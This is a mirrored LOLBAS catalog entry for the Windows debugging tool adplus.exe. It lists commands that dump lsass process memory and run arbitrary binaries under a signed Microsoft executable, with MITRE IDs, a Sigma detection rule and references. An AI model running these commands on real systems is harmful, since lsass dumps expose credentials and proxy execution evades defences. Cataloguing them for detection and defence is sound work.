mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 23:37:58 +01:00
0d7efb8ead
Co-authored-by: Wietze <wietze@users.noreply.github.com>
52 lines
2.2 KiB
YAML
52 lines
2.2 KiB
YAML
---
|
|
Name: adplus.exe
|
|
Description: Debugging tool included with Windows Debugging Tools
|
|
Author: mr.d0x
|
|
Created: 2021-09-01
|
|
Commands:
|
|
- Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
|
|
Description: Creates a memory dump of the lsass process
|
|
Usecase: Create memory dump and parse it offline
|
|
Category: Dump
|
|
Privileges: SYSTEM
|
|
MitreID: T1003.001
|
|
OperatingSystem: All Windows
|
|
- Command: adplus.exe -c config-adplus.xml
|
|
Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file).
|
|
Usecase: Run commands under a trusted Microsoft signed binary
|
|
Category: Execute
|
|
Privileges: User
|
|
MitreID: T1127
|
|
OperatingSystem: All Windows
|
|
- Command: adplus.exe -c config-adplus.xml
|
|
Description: Dump process memory using adplus config file (see Resources section for a sample file).
|
|
Usecase: Run commands under a trusted Microsoft signed binary
|
|
Category: Dump
|
|
Privileges: SYSTEM
|
|
MitreID: T1003.001
|
|
OperatingSystem: All Windows
|
|
- Command: adplus.exe -crash -o "C:\temp\" -sc calc.exe
|
|
Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.
|
|
Usecase: Run commands under a trusted Microsoft signed binary
|
|
Category: Execute
|
|
Privileges: User
|
|
MitreID: T1127
|
|
OperatingSystem: All windows
|
|
Full_Path:
|
|
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
|
|
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
|
|
Code_Sample:
|
|
- Code: https://gist.github.com/nasbench/e34ca2cd90e3a845a558a102a4f607da
|
|
Detection:
|
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
|
|
- IOC: As a Windows SDK binary, execution on a system may be suspicious
|
|
Resources:
|
|
- Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
|
|
- Link: https://twitter.com/nas_bench/status/1534916659676422152
|
|
- Link: https://twitter.com/nas_bench/status/1534915321856917506
|
|
Acknowledgement:
|
|
- Person: mr.d0x
|
|
Handle: '@mrd0x'
|
|
- Person: Nasreddine Bencherchali
|
|
Handle: '@nas_bench'
|